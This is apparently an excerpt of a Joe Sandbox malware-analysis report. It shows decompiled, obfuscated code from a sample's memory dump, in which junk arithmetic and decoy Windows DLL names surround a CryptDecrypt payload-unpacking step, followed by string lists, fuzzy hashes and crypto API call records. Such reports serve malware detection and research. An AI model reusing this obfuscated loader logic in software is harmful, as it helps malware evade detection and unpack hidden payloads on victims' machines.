      							if(E0040AEFC(L"Api-ms-win-downlevel-advapi32-l1-1-1.dll", 1, _t2471) >= 0x7e) {
      								E0040A0C0( &_v40, _v36);
      								E0040A0C0( &_v40, L"oleacchooks.dll");
      								E0040A0C0( &_v36, _v36);
      								E0040A0C0( &_v36, _v40);
      								E0040A0C0( &_v40, _v36);
      								E0040ACEC(_v36, 0, 1,  &_v40);
      							} else {
      								E0040ACEC(_v40, 1, 1,  &_v36);
      								E0040A0C0( &_v36, _v36);
      								E0040A0C0( &_v40, _v40);
      								E0040ACEC(_v36, 0, 1,  &_v40);
      								E0040A0C0( &_v36, _v36);
      								E0040A0C0( &_v40, _v36);
      							}
      						}
      						if(_v76 - _v44 >= _v76) {
      							E0040A0C0( &_v36, _v36);
      							E0040A0C0( &_v36, _v40);
      							E0040A0C0( &_v36, L"NlsData0047.dll");
      						} else {
      							E0040A0C0( &_v36, _v36);
      							E0040A0C0( &_v40, _v40);
      							E0040A0C0( &_v40, _v36);
      							E0040A0C0( &_v36, L"SensorsApi.dll");
      						}
      						E0040A0C0( &_v36, _v40);
      						E0040A0C0( &_v36, _v36);
      						E0040A0C0( &_v36, _v40);
      						E0040A0C0( &_v36, _v36);
      						_v120 = _v12;
      						if(_v120 != 0) {
      							_v120 =  *((intOrPtr*)(_v120 - 4));
      						}
      						_push(0);
      						_push(_v120);
      						_push(_v12);
      						_push(_v28);
      						if( *0x8b1250() == 0) {
      							L136:
      							E0040A0C0( &_v36, _v36);
      							_v60 = _v80 + _v72;
      							asm("fild dword [ebp-0x40]");
      							_v64 = E004076E8();
      							_v92 = _v76;
      							_v88 = _v84 + _v56;
      							E0040A0C0( &_v40, _v36);
      							_pop(_t2237);
      							 *[fs:eax] = _t2237;
      							_push(E00884967);
      							_v68 = _v92 + 0xe6;
      							_v72 = _v88 + 0xd8;
      							_v84 = 0x60 - _v48;
      							_v52 = _v56 - _v80;
      							__eflags = _v76 - _v68 - _v76;
      							if(_v76 - _v68 >= _v76) {
      								E0040A0C0( &_v36, L"FXSCOVER.exe");
      							} else {
      								__eflags = _v72 + 0xc2 - _v64;
      								if(_v72 + 0xc2 < _v64) {
      									E0040ACEC(_v40, 1, 1,  &_v40);
      									E0040A0C0( &_v36, _v36);
      									E0040A0C0( &_v36, _v36);
      									E0040A0C0( &_v36, _v40);
      									E0040A0C0( &_v40, _v36);
      									E0040A0C0( &_v40, L"RtlUnicodeStringToOemSize");
      								}
      							}
      							_push(_t2564);
      							_push(0x883f65);
      							_push( *[fs:eax]);
      							 *[fs:eax] = _t2565;
      							_t1182 =  *0x8a9f40; // 0x8b0925
      							_v137 =  *_t1182;
      							__eflags = _v137 + 0x9f - 0x1a;
      							if(_v137 + 0x9f - 0x1a < 0) {
      								_t871 =  &_v137;
      								 *_t871 = _v137 - 0x20;
      								__eflags =  *_t871;
      							}
      							_t1187 =  *0x8aa0b8; // 0x8b0928
      							_v138 =  *_t1187;
      							__eflags = _v138 + 0x9f - 0x1a;
      							if(_v138 + 0x9f - 0x1a < 0) {
      								_t875 =  &_v138;
      								 *_t875 = _v138 - 0x20;
      								__eflags =  *_t875;
      							}
      							_t1192 =  *0x8aa0b4; // 0x8b091f
      							_v139 =  *_t1192;
      							__eflags = _v139 + 0x9f - 0x1a;
      							if(_v139 + 0x9f - 0x1a < 0) {
      								_t879 =  &_v139;
      								 *_t879 = _v139 - 0x20;
      								__eflags =  *_t879;
      							}
      							_t1197 =  *0x8a9f14; // 0x8b0922
      							_v140 =  *_t1197;
      							__eflags = _v140 + 0x9f - 0x1a;
      							if(__eflags < 0) {
      								_t883 =  &_v140;
      								 *_t883 = _v140 - 0x20;
      								__eflags =  *_t883;
      							}
      							E0040A3C0(0);
      							_push(_v684);
      							E0040A3C0(0);
      							_push(_v688);
      							E0040A3C0(0);
      							_push(_v692);
      							E0040A3C0(0);
      							_push(_v696);
      							E006BA5A8(6,  &_v700, __eflags);
      							_push(_v700);
      							E006BA5A8(0,  &_v704, __eflags);
      							_push(_v704);
      							E006BA5A8(0,  &_v708, __eflags);
      							_push(_v708);
      							_push(0x88532c);
      							E0040A494( &_v148, _t2053, 8, _t2561, _t2562);
      							_t1218 =  *0x8aa15c; // 0x8b091c
      							_v141 =  *_t1218;
      							__eflags = _v141 + 0x9f - 0x1a;
      							if(_v141 + 0x9f - 0x1a < 0) {
      								_t906 =  &_v141;
      								 *_t906 = _v141 - 0x20;
      								__eflags =  *_t906;
      							}
      							_t1223 =  *0x8a9f14; // 0x8b0922
      							_v149 =  *_t1223;
      							__eflags = _v149 + 0x9f - 0x1a;
      							if(_v149 + 0x9f - 0x1a < 0) {
      								_t910 =  &_v149;
      								 *_t910 = _v149 - 0x20;
      								__eflags =  *_t910;
      							}
      							_t1228 =  *0x8a9f14; // 0x8b0922
      							_v150 =  *_t1228;
      							__eflags = _v150 + 0x9f - 0x1a;
      							if(_v150 + 0x9f - 0x1a < 0) {
      								_t914 =  &_v150;
      								 *_t914 = _v150 - 0x20;
      								__eflags =  *_t914;
      							}
      							_push(_v148);
      							E0040A3C0(0);
      							_push(_v716);
      							E0040A3C0(0);
      							_push(_v720);
      							E0040A3C0(0);
      							E0040A494( &_v712, _t2053, 4, _t2561, _t2562);
      							E0040A9E8( &_v36, _v712, _v724);
      							__eflags = 0;
      							_pop(_t2252);
      							 *[fs:eax] = _t2252;
      							_push(E00883F6C);
      							return E00409CBC( &_v148);
      						} else {
      							_v80 = 0;
      							while(_v80 < 9) {
      								_v80 = _v80 + 1;
      								_v312 = _v88 + 0xb7;
      								asm("fild dword [ebp-0x134]");
      								_v60 = E004076E8();
      							}
      							_t1262 =  *0x8a9abc; // 0x11dcea12
      							 *0x8a9abc = E00407278(_t1262);
      							_v68 = 0xe0 - _v92;
      							_t1266 =  *0x8a9b54; // 0xfcfc377e
      							_t2602 = _t1266 + 0xf8 -  *0x8a9a84; // 0x87862ac7
      							if(_t2602 >= 0) {
      								__eflags = 0;
      								_v76 = 0;
      								do {
      									_v44 = _v84 + _v48;
      									_t1271 =  *0x8a9b98; // 0xbc98d55c
      									 *0x8a9ac4 = _t1271 + 0xa2;
      									_t1273 =  *0x8a9b4c; // 0x4d1a0eb9
      									 *0x8a9b64 = _t1273 *  *0x8a9a70;
      									_t1275 =  *0x8a9af4; // 0xc0b2beda
      									 *0x8a9a70 = _t1275 +  *0x8a9b30;
      									_t1277 =  *0x8a9a50; // 0x3408bc9
      									 *0x8a9b30 = _t1277 +  *0x8a9ad4;
      									 *0x8a9a3c =  *0x8a9b50 * 0x2a;
      									_v76 = _v76 + 1;
      									__eflags = _v76 - 5;
      								} while (_v76 != 5);
      							} else {
      								_t1737 =  *0x8a9af0; // 0xd11327ee
      								 *0x8a9af0 = E00407278(_t1737);
      							}
      							_t1280 =  *0x8a9a84; // 0x87862ac7
      							_t2603 = _t1280 -  *0x8a9a8c -  *0x8a9b54; // 0xfcfc377e
      							if(_t2603 != 0) {
      								__eflags = 0;
      								 *0x8a9ba8 = 0;
      								_push(0x8a9adc);
      								_push( &_v84);
      								E00881594(0x8a9a34, _t2053,  &_v52, 0x8a9bb0,  &_v84, 0x8a9b74);
      							} else {
      								_t1735 =  *0x8a9b18; // 0x194
      								 *0x8a9ab4 = _t1735 + 4;
      							}
      							_t1287 =  *0x8a9b28; // 0xfbe6deff
      							_v312 = _t1287 + 0x2d;
      							asm("fild dword [ebp-0x134]");
      							 *0x8a9b40 = E004076E8();
      							_t1293 =  *0x8b1254(_v20, 0x6610, _v28, 0,  &_v24); // executed
      							if(_t1293 == 0) {
      								goto L136;
      							} else {
      								_push(_t2564);
      								_push(0x883593);
      								_push( *[fs:eax]);
      								 *[fs:eax] = _t2565;
      								E0040A0C0( &_v36, _v40);
      								_v88 = 0;
      								do {
      									_v312 = _v44 + 0x61;
      									asm("fild dword [ebp-0x134]");
      									_v72 = E004076E8();
      									E0040A0C0( &_v36, _v40);
      									_v88 = _v88 + 1;
      								} while (_v88 != 0xd);
      								_v68 = 0xda - _v84;
      								E0040A0C0( &_v36, _v36);
      								_v48 = _v52 - _v60;
      								E0040A0C0( &_v36, _v36);
      								_v32 = E006C0A40( *_v8);
      								_v60 = _v72 + 0x25;
      								_v84 = 0;
      								do {
      									_v68 = _v76 + _v92;
      									E0040ACEC(_v40, 1, 1,  &_v36);
      									_v84 = _v84 + 1;
      								} while (_v84 != 7);
      								_v64 = 0;
      								while(_v64 < 4) {
      									_v64 = _v64 + 1;
      									_t1732 =  *0x8a9a44; // 0xa3011753
      									 *0x8a9b28 = _t1732;
      									_v80 = _v56 + _v52;
      								}
      								_v88 = 0;
      								_t1324 =  *0x8a9a6c; // 0xfbe7a61a
      								 *0x8a9b1c = _t1324;
      								E0040ACEC(_v36, 0, 1,  &_v36);
      								if(_v76 - _v80 < _v76) {
      									 *0x8a9a78 = E008A9B04 * 0x6c;
      								}
      								_t1330 =  *0x8a9a74; // 0xedbf3fa1
      								 *0x8a9ab4 = _t1330 - 0xa8;
      								if(CryptDecrypt(_v24, 0, 0xffffffff, 0,  *( *_v8 + 4),  &_v32) != 0) {
      									if(_v80 + 0x30 >= _v44) {
      										__eflags = _v92 + _v72 - _v72;
      										if(_v92 + _v72 <= _v72) {
      											E0040A0C0( &_v40, _v36);
      											E0040A0C0( &_v36, _v40);
      											__eflags = 0;
      											E0040ACEC(_v36, 0, 1,  &_v36);
      											E0040A0C0( &_v40, _v40);
      											E0040A0C0( &_v36, _v40);
      											E0040A0C0( &_v36, _v36);
      										} else {
      											E0040ACEC(_v36, 0, 1,  &_v36);
      											E0040ACEC(_v36, 0, 1,  &_v40);
      											E0040A0C0( &_v40, L"VarCyMulI8");
      											E0040A0C0( &_v36, _v36);
      											E0040A0C0( &_v36, _v40);
      											E0040A0C0( &_v36, _v36);
      										}
      										E0040ACEC(_v40, 1, 1,  &_v36);
      										_t1512 =  *0x8a99d4; // 0x0
      										_v124 = _t1512;
      										__eflags = _v124;
      										if(_v124 != 0) {
      											_t1696 = _v124 - 4;
      											__eflags = _t1696;
      											_v124 =  *_t1696;
      										}
      										__eflags = _v124 - 0x2e;
      										if(_v124 <= 0x2e) {
      											E0040A0C0( &_v36, _v36);
      											E0040A0C0( &_v40, _v40);
      											E0040A0C0( &_v40, _v36);
      											E0040A0C0( &_v36, _v40);
      											E0040A0C0( &_v36, _v36);
      											E0040A0C0( &_v36, _v40);
      										} else {
      											E0040A0C0( &_v40, _v36);
      											E0040ACEC(_v40, 1, 1,  &_v40);
      											E0040A0C0( &_v36, _v40);
      											E0040A0C0( &_v40, L"KBDBGPH.DLL");
      											E0040A0C0( &_v40, _v40);
      											E0040A0C0( &_v36, _v36);
      										}
      										__eflags = 0;
      										E0040ACEC(_v36, 0, 1,  &_v36);
      									} else {
      										_v52 = _v56 + 0xb3;
      										_v80 = 0;
      										while(_v80 < 5) {
      											_v80 = _v80 + 1;
      											_v44 = _v76 - 0xbe;
      											_v92 = _v88 + 0x67;
      											E0040A0C0( &_v40, _v40);
      											E0040A0C0( &_v36, _v40);
      											E0040A0C0( &_v36, _v36);
      											E0040ACEC(_v36, 0, 1,  &_v40);
      										}
      										E0040ACEC(_v40, 1, 1,  &_v36);
      									}
      									E0040A0C0( &_v36, _v40);
      									E0040ACEC(_v40, 1, 1,  &_v36);
      									E0040ACEC(_v40, 1, 1,  &_v40);
      									E0040A0C0( &_v36, L"RegGetKeySecurity");
      									E0040A0C0( &_v36, L"RtlQuerySecurityObject");
      									E006C0A5C( *_v8, _v32);
      									_t2617 = 0x38 - _v72 - 0x27;
      									if(0x38 - _v72 < 0x27) {
      										_v60 = 0;
      										_push(_v68);
      										_t1658 =  *0x8a9b5c; // 0x8630d835
      										_push(_t1658);
      										_t2430 =  *0x8a9ad4; // 0xba811226
      										E008736F0(_v84, _t2053, _v72, _t2430, _t2617);
      										E0040A0C0( &_v36, L"spwmp.dll");
      										_v72 = _v44 + _v84;
      										E0040A0C0( &_v36, L"Microsoft.Windows.Diagnosis.TroubleshootingPack.resources.dll");
      										_t1667 =  *0x8a9b4c; // 0x4d1a0eb9
      										if(_t1667 -  *0x8a9a6c < 0x55) {
      											_v68 = _v56 - 0x59;
      											_v48 = _v88 * _v80;
      											 *0x8a9b18 = 0x45 -  *0x8a9ba4;
      											_t1675 =  *0x8a9b54; // 0xfcfc377e
      											 *0x8a9bb0 = _t1675 + 0x74;
      											_v312 = _v92 + 0xae;
      											asm("fild dword [ebp-0x134]");
      											_v52 = E004076E8();
      											_t1680 =  *0x8a9b00; // 0xf8c6059a
      											 *0x8a9b1c = _t1680 + 4;
      										}
      									}
      									_t1545 =  *0x8a9b88; // 0x2c903efa
      									 *0x8a9ac0 = _t1545 -  *0x8a9b38;
      									E0040A0C0( &_v36, _v40);
      									_t1549 =  *0x8a9b98; // 0xbc98d55c
      									 *0x8a9ad8 = _t1549 *  *0x8a9b4c;
      									 *0x8a9b78 = 0;
      									E0087EB5C();
      									 *0x8a9ad4 =  *0x8a9b78 * 0x1c;
      									_v13 = 1;
      									_v72 = _v80 * 0x6c;
      									_t1555 =  *0x8aa288; // 0x8b091b
      									_v125 =  *_t1555;
      									if(_v125 + 0x9f - 0x1a < 0) {
      										_v125 = _v125 - 0x20;
      									}
      									_t1560 =  *0x8a9ce4; // 0x8b0912
      									_v126 =  *_t1560;
      									if(_v126 + 0x9f - 0x1a < 0) {
      										_v126 = _v126 - 0x20;
      									}
      									_t1565 =  *0x8aa288; // 0x8b091b
      									_v127 =  *_t1565;
      									if(_v127 + 0x9f - 0x1a < 0) {
      										_v127 = _v127 - 0x20;
      									}
      									_t1570 =  *0x8a9cf4; // 0x8b0911
      									_v128 =  *_t1570;
      									if(_v128 + 0x9f - 0x1a < 0) {
      										_t583 =  &_v128;
      										 *_t583 = _v128 - 0x20;
      										_t2627 =  *_t583;
      									}
      									E0040A3C0(0);
      									_push(_v360);
      									E0040A3C0(0);
      									_push(_v364);
      									E0040A3C0(0);
      									_push(_v368);
      									E0040A3C0(0);
      									_push(_v372);
      									E0040A3C0(0);
      									_push(_v376);
      									E0040A3C0(0);
      									_push(_v380);
      									_push(0x88532c);
      									E0040A3C0(0);
      									_push(_v384);
      									E0040A3C0(0);
      									_push(_v388);
      									E0040A3C0(0);
      									_push(_v392);
      									E0040A3C0(0);
      									_push(_v396);
      									E0040A3C0(0);
      									_push(_v400);
      									E0040A3C0(0);
      									_push(_v404);
      									E0040A3C0(0);
      									_push(_v408);
      									E0040A3C0(0);
      									_push(_v412);
      									E0040A3C0(0);
      									_push(_v416);
      									E0040A3C0(0);
      									_push(_v420);
      									E0040A3C0(0);
      									_push(_v424);
      									E0040A3C0(0);
      									_push(_v428);
      									E0040A3C0(0);
      									_push(_v432);
      									E0040A3C0(0);
      									_push(_v436);
      									E0040A3C0(0);
      									_push(_v440);
      									E0040A3C0(0);
      									_push(_v444);
      									E0040A3C0(0);
      									_push(_v448);
      									E0040A3C0(0);
      									_push(_v452);
      									_push(0x88532c);
      									E0040A3C0(0);
      									_push(_v456);
      									E0040A3C0(0);
      									_push(_v460);
      									E0040A3C0(0);
      									_push(_v464);
      									E0040A3C0(0);
      									_push(_v468);
      									E0040A3C0(0);
      									_push(_v472);
      									E0040A3C0(0);
      									_push(_v476);
      									E0040A3C0(0);
      									_push(_v480);
      									_push(0x88532c);
      									E0040A3C0(0);
      									_push(_v484);
      									E0040A3C0(0);
      									_push(_v488);
      									E0040A3C0(0);
      									E0040A494( &_v356, _t2053, 0x25, _t2561, _t2562);
      									E0040A9E8( &_v36, _v356, _v492);
      									_v52 = 0;
      									E00870FD8( &_v68, 0x8a9a54, _t2627);
      									_v88 = 0;
      									do {
      										_v60 = _v48 - 0x82;
      										_v88 = _v88 + 1;
      									} while (_v88 != 5);
      									_t1653 =  *0x8a9a38; // 0x438e1da9
      									 *0x8a9ad8 = _t1653;
      									E0040A0C0( &_v36, _v40);
      								}
      								_pop(_t2267);
      								 *[fs:eax] = _t2267;
      								_push(E0088359D);
      								_v88 = 0;
      								do {
      									if(_v72 + _v80 < _v72 + _v72) {
      										_v64 = _v56 * _v80;
      										_v44 = _v72 * 0xf7;
      										_v60 = _v68 + 0x70;
      										E0040A0C0( &_v40, _v36);
      										_t1443 =  &_v264;
      										_t2302 =  *0x8aa15c; // 0x8b091c
      										 *((char*)(_t1443 + 1)) =  *_t2302;
      										 *_t1443 = 1;
      										E0040A324( &_v268,  &_v264);
      										_t1446 =  &_v272;
      										_t2305 =  *0x8aa288; // 0x8b091b
      										 *((char*)(_t1446 + 1)) =  *_t2305;
      										 *_t1446 = 1;
      										E0040A34C( &_v268, 2,  &_v272);
      										E0040A324( &_v312,  &_v268);
      										_t1451 =  &_v272;
      										_t2309 =  *0x8a9c3c; // 0x8b0918
      										 *((char*)(_t1451 + 1)) =  *_t2309;
      										 *_t1451 = 1;
      										E0040A34C( &_v312, 3,  &_v272);
      										E0040A324( &_v500,  &_v312);
      										_t1456 =  &_v272;
      										_t2313 =  *0x8aa080; // 0x8b0916
      										 *((char*)(_t1456 + 1)) =  *_t2313;
      										 *_t1456 = 1;
      										E0040A34C( &_v500, 4,  &_v272);
      										E0040A324( &_v508,  &_v500);
      										_t1461 =  &_v272;
      										_t2317 =  *0x8aa0b8; // 0x8b0928
      										 *((char*)(_t1461 + 1)) =  *_t2317;
      										 *_t1461 = 1;
      										E0040A34C( &_v508, 5,  &_v272);
      										E0040A324( &_v516,  &_v508);
      										_t1466 =  &_v272;
      										_t2321 =  *0x8aa15c; // 0x8b091c
      										 *((char*)(_t1466 + 1)) =  *_t2321;
      										 *_t1466 = 1;
      										E0040A34C( &_v516, 6,  &_v272);
      										E0040A324( &_v524,  &_v516);
      										E0040A34C( &_v524, 7, 0x885618);
      										E0040A324( &_v536,  &_v524);
      										_t1475 =  &_v272;
      										_t2327 =  *0x8aa15c; // 0x8b091c
      										 *((char*)(_t1475 + 1)) =  *_t2327;
      										 *_t1475 = 1;
      										E0040A34C( &_v536, 8,  &_v272);
      										E0040A324( &_v548,  &_v536);
      										_t1480 =  &_v272;
      										_t2331 =  *0x8a9f14; // 0x8b0922
      										 *((char*)(_t1480 + 1)) =  *_t2331;
      										 *_t1480 = 1;
      										E0040A34C( &_v548, 9,  &_v272);
      										E0040A324( &_v560,  &_v548);
      										_t1485 =  &_v272;
      										_t2335 =  *0x8a9f14; // 0x8b0922
      										 *((char*)(_t1485 + 1)) =  *_t2335;
      										 *_t1485 = 1;
      										E0040A34C( &_v560, 0xa,  &_v272);
      										E0040AA98( &_v560);
      										E0040A0C0( &_v36, _v40);
      									}
      									E0040A0C0( &_v40, L"MmcAspExt.dll");
      									E0040ACEC(_v40, 1, 1,  &_v36);
      									E0040A0C0( &_v36, _v36);
      									_v88 = _v88 + 1;
      								} while (_v88 != 0xb);
      								E0040ACEC(_v40, 1, 1,  &_v36);
      								if(_v76 - _v68 < 0x7a) {
      									E0040A0C0( &_v40, _v40);
      									E0040A0C0( &_v36, _v36);
      									E0040ACEC(_v36, 0, 1,  &_v36);
      									E0040A0C0( &_v36, _v40);
      									E0040A0C0( &_v40, L"mswmdm.dll");
      									E0040A0C0( &_v40, _v40);
      								}
      								if(_v76 + 0xb8 >= _v72) {
      									_t1356 =  *0x8a99d4; // 0x0
      									E0040ACB4(_t1356, L"DevicePairingHandler.dll");
      									if(__eflags != 0) {
      										E0040A0C0( &_v36, _v36);
      										E0040A0C0( &_v40, L"mssitlb.dll");
      										E0040A0C0( &_v40, _v36);
      										E0040A0C0( &_v36, _v40);
      										__eflags = 0;
      										E0040ACEC(_v36, 0, 1,  &_v36);
      										E0040A0C0( &_v40, _v36);
      									} else {
      										E0040ACEC(_v36, 0, 1,  &_v36);
      										E0040A0C0( &_v36, _v40);
      										E0040A0C0( &_v40, _v40);
      										E0040A0C0( &_v40, _v36);
      										E0040A0C0( &_v36, _v40);
      										E0040A0C0( &_v36, _v36);
      									}
      								} else {
      									E0040A0C0( &_v36, _v36);
      								}
      								E0040A0C0( &_v36, _v40);
      								E0040A0C0( &_v36, _v40);
      								CryptDestroyKey(_v24);
      								_v312 = _v48 + 0x17;
      								asm("fild dword [ebp-0x134]");
      								_v64 = E004076E8();
      								E0040A0C0( &_v36, _v40);
      								_t1382 =  *0x8a9a58; // 0x4192234
      								 *0x8a9b24 = _t1382;
      								_v56 = 0;
      								_push(_v80);
      								_push(_v88);
      								_t2284 =  *0x8a9ba0; // 0x6009aac0
      								E0087039C(_v44, _t2053, _t2284, _t2561, _t2562);
      								_t2285 =  *0x8a9b10; // 0x0
      								if(E0040AEFC(L"igd10umd32.dll", 1, _t2285) != 0x49) {
      									_v84 = 0;
      									do {
      										_v92 = _v44 + 4;
      										_v312 = _v52 + 0x7d;
      										asm("fild dword [ebp-0x134]");
      										_v68 = E004076E8();
      										_t1401 =  *0x8a9a78; // 0x60792c44
      										 *0x8a9b14 = _t1401 - 0xf6;
      										_t1403 =  *0x8a9bbc; // 0x6009aad7
      										 *0x8a9ba4 = _t1403 + 4;
      										 *0x8a9ae8 =  *0x8a9a94 * 0x87;
      										_t1406 =  *0x8a9b50; // 0x36c714d5
      										 *0x8a9b98 = _t1406 +  *0x8a9b90;
      										_v84 = _v84 + 1;
      									} while (_v84 != 0x10);
      								}
      								_t1390 = _v36;
      								_v132 = _t1390;
      								if(_v132 != 0) {
      									_t1390 =  *((intOrPtr*)(_v132 - 4));
      									_v132 = _t1390;
      								}
      								if(_v132 > 0xa6) {
      									_t1391 =  *0x8a9b54; // 0xfcfc377e
      									_t1392 = _t1391 *  *0x8a9bc0;
      									 *0x8a9ae4 = _t1392;
      									return _t1392;
      								}
      								return _t1390;
      							}
      						}
      					}
      				}
      			}

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $.$Api-ms-win-downlevel-advapi32-l1-1-1.dll$CustomMarshalers.dll$D,y`$DevicePairingHandler.dll$FXSCOVER.exe$KBDBGPH.DLL$Microsoft.Windows.Diagnosis.TroubleshootingPack.resources.dll$MmcAspExt.dll$NlsData0047.dll$OleCreateFromDataEx$RegGetKeySecurity$RtlDelete$RtlQuerySecurityObject$RtlUnicodeStringToOemSize$SensorsApi.dll$System.Configuration.Install.ni.dll$System.IO.dll$VarCyMulI8$igd10umd32.dll$mssitlb.dll$mswmdm.dll$oleacchooks.dll$spwmp.dll
      • API String ID: 0-571057648
      • Opcode ID: 837c685f78292b0f1606fd949dab1544831e29e3e3fc60c96b0bd03d4c7ad5a8
      • Instruction ID: 0ae2afd8c63baf23de251440c667564a859947553ed072fb774a3222ecfdf207
      • Opcode Fuzzy Hash: 837c685f78292b0f1606fd949dab1544831e29e3e3fc60c96b0bd03d4c7ad5a8
      • Instruction Fuzzy Hash: 2A23153490425D8FDB10EFA4D881BDDBBB5FF0A308F1040AAE444B77A2D639AA55CF65
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $$$,$,y`~$BrEvIF.dll$CNHL610.DLL$D,y`$ElfReportEventAndSourceW$GetClassFile$GetOverlappedAccessResults$IPBusEnumProxy.dll$KBDLT.DLL$KBDUSR.DLL$MigSetup.exe$NAPSTAT.EXE$NetDfsRemove$NetSetPrimaryComputerName$PresentationCore.dll$RtlEqualLuid$SfmDxSetSwapChainBindingStatus$StgOpenStorageOnILockBytes$^$api-ms-win-core-interlocked-l1-1-0.dll$api-ms-win-core-processenvironment-l1-1-0.dll$api-ms-win-core-profile-l1-1-0.dll$bcdedit.exe$dmdskmgr.dll$esscli.dll$mciseq.dll$mstask.dll$netshell.dll$s$sdclt.exe$vmictimeprovider.dll
      • API String ID: 0-3751233841
      • Opcode ID: 765d7ee5cd3482c3e572a7b0b00ebe5888e4cb3d417b3a14dceebf025310320a
      • Instruction ID: d5705780c892bafa6df46128ae735e4f56b141e536515f108fab6bc7d1f2bfca
      • Opcode Fuzzy Hash: 765d7ee5cd3482c3e572a7b0b00ebe5888e4cb3d417b3a14dceebf025310320a
      • Instruction Fuzzy Hash: E8933B3490826ACFDB00DF68E981ADDBBF5FB4A304F1040A6D448B7B61D734AA55CF66
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,?,008A9A44,00000000,0087AFBF,?,?,?,?,?,00000000), ref: 00878AFB
      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000,?,00000000,0087AD62,?,?,?,?,?,?,00000000,0087B0A4), ref: 00878B94
      • CryptHashData.ADVAPI32(00000000,008A4525,00000000,00000000,438E1DA9,?,00000000,0087A507,?,?,?,?,?,?,?,00000000), ref: 00878EE3
      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00879370
      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,008A4525), ref: 00879732
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Crypt$Hash$Param$AcquireContextCreateData
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $,y`~$D,y`$I$MSTTSuser.dll$NlsData004e.dll$OleInitializeWOW$QuerySendMessage$System.Diagnostics.TextWriterTraceListener.dll$System.Speech.ni.dll$api-ms-win-core-fibers-l1-1-0.dll$dpnlobby.dll$wcsstr$wkscli.dll
      • API String ID: 2428702908-2360565770
      • Opcode ID: 4aa3557ba7c9669ed2d383384b856f4c218db0c9a910a5b0a0425b3726d68a2c
      • Instruction ID: cf61213450a772018895127d1e37cd81cfaede83b8eb6fc4599cb68f8fb24d5b
      • Opcode Fuzzy Hash: 4aa3557ba7c9669ed2d383384b856f4c218db0c9a910a5b0a0425b3726d68a2c
      • Instruction Fuzzy Hash: 90334034909259CFEB00DF68EC81BCDBBB5FB4A304F1080A6D488A7B61D735AA56CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $,y`~$AuthFWWizFwk.dll$CNB_0279.DLL$CreateEventExA$CryptGetDefaultProviderA$D,y`$EventWrite$GetInformationCodeAuthzLevelW$GetUserObjectInformationA$IMJPAPI.DLL$MPG4DECD.DLL$Microsoft.Windows.Diagnosis.SDuser.ni.dll$NlsLexicons0007.dll$RtlGetFullPathName_U$System.Data.DataSetExtensions.dll$System.Runtime.Serialization.Xml.dll$VarI4FromR8$WMPEncEn.dll$WcsPlugInService.dll$api-ms-win-core-namedpipe-l1-1-0.dll$api-ms-win-core-processthreads-l1-1-0.dll$api-ms-win-core-threadpool-l1-1-0.dll$hpzprw71.dll$imkrhjd.dll$mimefilt.dll$oledb32r.dll$srcore.dll$sspisrv.dll$w3ctrs.dll$wow64win.dll
      • API String ID: 0-815326250
      • Opcode ID: bd6f776698bf5ebe3350416b0fe2377eecb546d571adda2870142f05ecf6b7a2
      • Instruction ID: ed27780ebbea777809120fd9b064ea54145ce40deeb132efdad1df661e81c355
      • Opcode Fuzzy Hash: bd6f776698bf5ebe3350416b0fe2377eecb546d571adda2870142f05ecf6b7a2
      • Instruction Fuzzy Hash: 28F2F635908219CFDB04EFA8E981ACDB7F9FB49304F2040AAE444B76A1D735AE45CF65
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,?,008A9A44,00000000,0087AFBF,?,?,?,?,?,00000000), ref: 00878AFB
      Strings
      Memory Dump Source
